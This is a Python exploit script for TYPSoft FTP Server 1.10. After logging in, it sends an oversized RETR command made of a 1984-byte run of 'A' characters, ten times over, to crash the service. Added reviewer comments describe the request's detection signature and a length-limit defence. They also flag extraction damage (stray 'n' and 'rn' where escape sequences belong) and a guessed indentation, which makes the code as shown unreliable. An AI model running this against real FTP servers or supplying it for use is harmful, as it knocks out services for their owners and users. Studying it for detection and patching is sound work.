# Title : TYPSoft FTP Server v1.10 RETR Command DoS
# Published : 2010-05-14
# Author : Jeremiah Talamantes
# Tested on: Windows XP, SP2 (EN)
#!/usr/bin/python
# Start-up banner: tool name, affected product/version and author contact.
# The literals are reproduced exactly as they appear on the page.
# NOTE(review): the stray "n" at the start of the first line and the end of
# the last one looks like extraction damage -- confirm against the original.
for banner_line in (
    "n#################################################################",
    "## RedTeam Security ##",
    "## TYPSoft FTP Server RETR Command DoS ##",
    "## Version 1.10 ##",
    "## ##",
    "## Jeremiah Talamantes ##",
    "## labs@redteamsecure.com ##",
    "################################################################# n",
):
    # A single parenthesised string prints identically under Python 2's
    # print statement, which the rest of this script relies on.
    print(banner_line)
import socket
import sys
# Description:
# RETR command overflow with no PORT specified
# Define the exploit's usage
def Usage():
    """Print the command-line synopsis and the author credit.

    The script expects three positional arguments: target IP, FTP user
    name and FTP password. Nothing is returned; output goes to stdout.
    """
    # Literals kept verbatim from the page.
    # NOTE(review): the trailing/leading "n" characters look like
    # extraction damage -- confirm against the original.
    for usage_line in (
        "Usage: scriptname.py <IP> <username> <password>n",
        "nnCredit: Jeremiah Talamantes",
        "RedTeam Security : www.redteamsecure.com/labsn",
    ):
        print (usage_line)
# Oversized RETR argument: 496 repetitions of "AAAA" = 1984 bytes of "A".
# For detection purposes this is the distinguishing feature of the request:
# a RETR path far longer than any legitimate file name.
# NOTE: the name shadows the Python 2 builtin ``buffer``; it is left as is
# because exploit() reads this module-level name.
buffer = "AAAA" * 496
def exploit(hostname,username,password):
    """Log in to the FTP service and send one oversized RETR, ten times over.

    Each pass opens a new TCP connection to port 21 on ``hostname``, reads
    the server's first response, sends the USER and PASS strings built from
    ``username`` and ``password`` (each reply is read and discarded), sends
    "RETR " followed by the 1984-byte module-level ``buffer``, and closes
    the socket without reading a reply. No PORT command is sent first,
    which matches the description in the file header.

    The process exits with status 1 as soon as a connection attempt fails.

    What this looks like from the server side: an authenticated session
    whose only request is a RETR with a ~2 KB argument of one repeated
    byte, with no data-channel setup before it, repeated over short-lived
    connections. A length limit on FTP command arguments at the server or
    an inspecting proxy covers this request shape.

    NOTE(review): indentation was lost on the page; the loop body is
    reconstructed on the assumption that everything through sock.close()
    runs once per iteration -- confirm against the original.
    NOTE(review): the "rn" suffixes are kept verbatim from the page and
    look like extraction damage.
    """
    for i in range(1, 11):
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            conn.connect((hostname, 21))
        except:
            # Bare except kept from the original: any failure to connect
            # ends the whole run.
            print ("Error: unable to connect to host")
            sys.exit(1)

        greeting = conn.recv(1024)
        print "[+] " + greeting + ": iteration number: ", i

        # Credentials first; each reply is read but not inspected.
        for login_line in ("USER " + username + "rn", "PASS " + password + "rn"):
            conn.send(login_line)
            conn.recv(1024)

        # The oversized request; the socket is closed without waiting for
        # a reply.
        conn.send("RETR " + buffer + "rn")
        conn.close()
# Entry point: exactly three arguments are required (target IP, FTP user
# name, FTP password). Anything else prints the usage text and exits 1.
if len(sys.argv) != 4:
    Usage()
    sys.exit(1)

hostname, username, password = sys.argv[1:4]
exploit(hostname, username, password)
sys.exit(0)
# End